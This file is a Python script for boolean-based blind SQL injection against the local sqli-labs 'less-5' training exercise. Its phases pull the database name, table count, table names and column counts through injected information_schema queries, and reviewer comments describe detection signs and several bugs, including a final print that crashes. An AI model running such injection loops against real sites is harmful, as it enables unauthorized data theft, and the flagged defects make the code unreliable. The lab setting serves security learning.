import requests
# Boolean-based blind SQL injection walkthrough for the local sqli-labs
# "less-5" exercise (target hard-coded to 127.0.0.1 below).  Every probe is a
# GET whose `id` parameter carries `1'and <guess>=(<subquery>)--+`, and the
# presence of the page text 'You are in...........' is used as the true/false
# oracle.  Defender's view: the loops below emit hundreds of near-identical
# requests from one client that differ only in a counter inside `id` and
# reference information_schema / substr(database()) — query-string matching on
# those tokens, or a per-client alert on high request volume with a varying
# single parameter, is enough to surface this traffic in access logs.
#
# The original paste had lost all indentation; the structure below is the
# reading implied by the break/continue placement.

# Working state for the database-name phase; all but db_name are reassigned by
# the loops that follow.
db_length=1
db_url=''
db_place=1
db_name=''
db_ascii=1
print("猜解数据库长度")  # "guess the database-name length"
# `?id=1'` closes the quoted literal; every suffix is concatenated directly
# after the quote with no separating space.
url="http://127.0.0.1/sqli-labs-master/less-5/?id=1'"
# Phase 1: find length(database()) by testing the values 1..99 one request each.
for db_length in range(1,100):
    db_url=url+'and %d=(select length(database()))--+'%(db_length)
    r=requests.get(db_url)
    # Presumably rendered by the lab page only when the injected predicate is
    # true — this string is the whole oracle, so a changed page template breaks
    # every phase below.
    if 'You are in...........' in r.text:
        print('[!] '+db_url)
        print('猜解结束')  # "guessing finished"
        break
    else:
        print('[x] '+db_url)
# If no value matched, db_length is simply the last value tried (99).
print('数据库名长度:%d'%(db_length))  # "database-name length: %d"
print("-----------------------")
print('猜解数据库名称')  # "guess the database name"
# Dead assignment: overwritten unconditionally on the first loop iteration.
db_urlname=url+'and %d=(ascii(substr(database(),%d,1)))--+'%(db_ascii,db_place)
# Phase 2: recover database() one character at a time, trying ASCII 0..126 per
# position (up to 127 requests per character).
for db_place in range(1,db_length+1):
    for db_ascii in range(0,127):
        db_urlname=url+'and %d=(ascii(substr(database(),%d,1)))--+'%(db_ascii,db_place)
        print(db_urlname)
        r = requests.get(db_urlname)
        if 'You are in...........' in r.text:
            db_name=db_name+chr(db_ascii)
            print('[!]'+db_name)
            break
        else:
            # No-op branch: the loop would continue anyway.
            continue
print('数据库的名称是:'+db_name)  # "the database name is:"
print("------------------------")
print('猜解表的个数')  # "guess the number of tables"
tb_urlname=''  # unused
tb_url=''
tb_number=1
# Phase 3: count tables in the current schema; only 1..9 are tried, so a
# schema with 10+ tables leaves tb_number at 9.
for tb_number in range(1,10):
    tb_url=url+'and %d=(select count(table_name) from information_schema.tables where table_schema=database())--+'%(tb_number)
    r = requests.get(tb_url)
    if'You are in...........' in r.text:
        print('[!]'+tb_url)
        break
    else:
        print('[x]'+tb_url)
print('表的数目是=%d'%(tb_number))  # "number of tables = %d"
print("-------------------------")
print("猜解每个表的长度")  # "guess the length of each table name"
tb_lengthurl=''
tb_namelength=1
tb_num1=0
tb_array=[]  # tb_array[i] = recorded name length of the table at `limit i,1`
# Phase 4: length (1..19) of each table name via `limit <offset>,1`.
# NOTE(review): the upper bound is tb_number+1 here but tb_number in Phase 5,
# so one offset past the last table is probed as well (19 extra requests).
for tb_num1 in range(0,tb_number+1):
    for tb_namelength in range(1,20):
        tb_lengthurl = url + 'and %d=length((select concat(table_name)from information_schema.tables where table_schema=database() limit %d,1))--+' % (tb_namelength,tb_num1)
        r = requests.get(tb_lengthurl)
        if 'You are in...........' in r.text:
            tb_array.append(tb_namelength)
            print('[!] %d'%(tb_namelength)+ '>>%s'%(tb_lengthurl))
            # Has no effect: `break` follows immediately and the for loop
            # reassigns tb_namelength on its next iteration.
            tb_namelength=0
            break
        else:
            print('[x]' + tb_lengthurl)
            continue
for i in range(0,len(tb_array)):
    print("第%d个表的长度:%d"%(i+1,tb_array[i]))  # "length of table #%d: %d"
print("--------------------------")
print("猜解每个表的名字")  # "guess the name of each table"
tb_name=''
tb_nameurl=''
tb_num2=0
tb_length=1
tb_nameasci=1
tb_arrayname=[]
# Phase 5: table names.  range(1, tb_array[..]) stops one short of the
# recorded length, so the final character of each name is never probed;
# range(95,128) covers '_' through 0x7F only.  tb_name is never reset between
# tables, so each entry appended below is the concatenation of all names so
# far.
for tb_num2 in range(0,tb_number):
    for tb_length in range(1,tb_array[tb_num2]):
        for tb_nameasci in range(95,128):
            tb_nameurl=url+'and %d=(ascii(substr((select concat(table_name)from information_schema.tables where table_schema=database() limit %d,1),%d,1)))--+'%(tb_nameasci,tb_num2,tb_length)
            r = requests.get(tb_nameurl)
            if'You are in...........' in r.text:
                tb_name=tb_name+chr(tb_nameasci)
                print('[!]'+tb_nameurl)
                print(tb_name)
                break
            else:
                print('[x]'+tb_nameurl)
                continue
    # Indent inferred from the un-indented paste: one append per table, which
    # is what the tb_number-length print loop below expects.
    tb_arrayname.append(tb_name)
for i in range(0,tb_number):
    print('第%d个表的名字:%s' % ((i+1),tb_arrayname[i]))  # "name of table #%d: %s"
print("----------------------------")
print("猜解每个表中列的个数")  # "guess the column count of each table"
cb_url=''
cb_sum=0  # unused
cb_array=[]
# Phase 6: column count (1..9) per table.  The loop starts at index 1, so
# tb_arrayname[0] is skipped, and a table whose count is not found in 1..9
# gets no entry at all, shifting later indexes.
for tb_num2 in range(1,tb_number):
    for i in range(1,10):
        cb_url=url+"and %d=(select count(column_name)from information_schema.columns where table_name='%s')--+"%(i,tb_arrayname[tb_num2])
        r=requests.get(cb_url)
        if 'You are in...........' in r.text:
            cb_array.append(i)
            print('[!]'+cb_url)
            break
        else:
            continue
# NOTE(review): the format string below has a single %s but is given a
# two-element tuple, so this print raises TypeError as soon as it is reached;
# it also indexes tb_arrayname[tb_num2-1] while Phase 6 used
# tb_arrayname[tb_num2].
for tb_num2 in range(1,tb_number):
    print('%s表的列数是:'%(tb_arrayname[tb_num2-1],cb_array[tb_num2-1]))  # "%s table column count:"
print('-----------------------------')
这是对付sqli-labs less5 的盲注python脚本(不懂,写了好久)